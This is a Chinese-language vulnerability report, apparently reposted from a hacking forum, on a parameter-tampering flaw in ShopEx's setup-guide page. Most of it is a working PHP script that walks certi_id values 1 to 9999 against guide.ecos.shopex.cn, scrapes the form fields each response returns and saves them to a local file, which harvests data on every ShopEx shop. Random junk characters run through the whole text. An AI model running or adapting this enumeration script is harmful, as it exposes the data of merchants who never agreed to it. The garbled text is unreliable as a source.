|
简要描述:" `3 K& b; a4 I3 k7 g: ?1 u$ v, c
ShopEx某接口缺陷,可遍历所有网站
( {4 r/ F+ O8 D' W+ |# Y; S' ?6 ^详细说明:
7 k2 R% z. k$ {3 D# s) {% G3 A3 P问题出现在shopex 网店使用向导页面
1 p. t9 t+ s$ N
1 U1 w) K' {/ H8 ^: J% I* v E" P4 \
7 Q* ^1 L3 ?; j! O) ~+ zhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
1 R, }+ F) v( r, F4 c) V# `: A1 e0 D( r! w) G5 H6 t! r
" Z: L" M& m2 ^& x. a1 l/ I, m, C% K% p, g) R: ]
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
7 O2 [5 ~4 [/ I0 G6 l: j( Q/ j- Z
9 R5 }( m$ ` f; W0 D1 Y
& l" @0 Q) A; ]* {3 ~# H$ Z2 ~0 P1 n: o( B6 }
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
+ i) M6 k' N6 l7 u
. M# T. _/ b2 W$ G8 s; z+ _) v* z
/ }+ `! x7 Y4 k: q0 m( C$ F: U! X& _1 ^- D' \& R( I3 M
<?php
* P% j1 [+ q# W9 E& n1 o! r# }! h2 p, U
for ($i=1; $i < 10000; $i++) { //遍历' g( G- Z/ k2 n7 N
. U5 p% z$ N$ F8 f% L+ A( g" `/ ^ ShowshopExD($i);- h) r% ]! T1 v ~6 Q
) T8 @. n6 G8 X4 q$ \ }
! r2 T# R: Z. A1 ]% T. T0 y1 `4 X% s; K M, H# w9 b# _
function ShowshopExD($cid) {
4 l0 u# m3 g6 `3 h% T: \
4 N x/ B |1 Y; E1 |0 ]0 W/ ^ $url='http://guide.ecos.shopex.cn/step2.php';
/ o" ~% ~, ^1 `* m& }3 x; M( y2 D9 _2 I1 M+ U
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
- }( O9 a; Q4 S( B% @
' z; Y& e+ m1 Z $url = $url.'?refer='.$refer;1 J) S& j4 G; M" O( t
( u% R9 P7 Z: ]. {& ?' d1 P $ch = curl_init($url);0 B' N4 b4 h. V& F% |3 f: p
3 m) P' O# Y4 U! h/ | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 i: j1 ]6 D' C
A) U/ L. C: n- g k1 W curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
% Y# K7 C$ f! @1 O# F, C* z& S/ z& A2 a5 Q; y, Z. h% N
$result = curl_exec($ch);
) e0 K8 [" J+ Y6 e( h; f' k5 y8 T' F8 `* b% G2 ~+ b
$result = mb_convert_encoding($result, "gb2312", "UTF-8");" S5 H( V W. \% L
$ D$ ?) G( M: x+ A: H. f9 Q if(strpos($result,$refer))# m1 ?; a* v! l) Y$ ]' U$ {* @3 T8 R
2 k* @# ?/ c4 Y
{" [9 I% U' \# ~. b2 o: |1 Z
* w5 S- d7 l; ], H5 L1 m
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
. ?9 _; j- i3 L5 Z
5 o; C! l6 c0 h/ X- r8 t( E preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
) a% o. |1 J2 ^5 z2 ]2 {9 C4 y1 x5 c% M* E6 h% S
foreach ($value[1] as $key) {3 k6 L, u! x1 R, t/ G" ^ q w
, b' C T3 t2 C
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
& u. d4 @6 P, Y$ q; p4 V* I# {5 @: R8 s* B% m
echo $res[1][0].':'.$res[3][0]."\r\n";
! N l4 I L v7 f
: @; T* C* N! m $col =$res[1][0].':'.$res[3][0]."\r\n"; & ^* K# s8 u2 I4 T8 P
# f s3 h2 E) A" o6 K fwrite($fp, $col, strlen($col)); : l' C8 @, y9 |" |. I0 s! Z
6 X$ {7 {9 D \) J4 i; h }
6 Q6 ^3 |: F r2 Q @& o5 Q
6 P5 q6 C3 E1 E! C( v: s echo '--------------------------------'."\r\n";/ J2 [6 H) v# _& s# E; ]; p5 J
6 k3 n: u* u: {- y
fclose($fp);
% U L# J; @8 a+ z; o+ p$ e' _& `# M) d; k w, G2 V; w
}! k' N8 g, d: C7 w+ c2 ^# A v$ ]
6 K& N+ `% B; }, p0 q
flush();
3 m5 v$ ^! p: R1 j2 O% c8 x% v/ T3 c' g- _0 B6 V. V/ f% }
curl_close($ch);
: D0 Y% r' K7 k6 ?" s9 O/ {# J! t8 j$ k7 ~2 x6 H! h! [
}8 S* `% R" f3 M$ q9 G# H7 G* V
; x( |$ `' H6 d
?>
r# B3 d ]- t# H9 L漏洞证明:8 O, s/ I1 I' o# B8 w9 d6 t
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg4 m5 ^. T* m# r
refer换成其他加密方式
; V4 z/ p/ {# U0 B( n |
|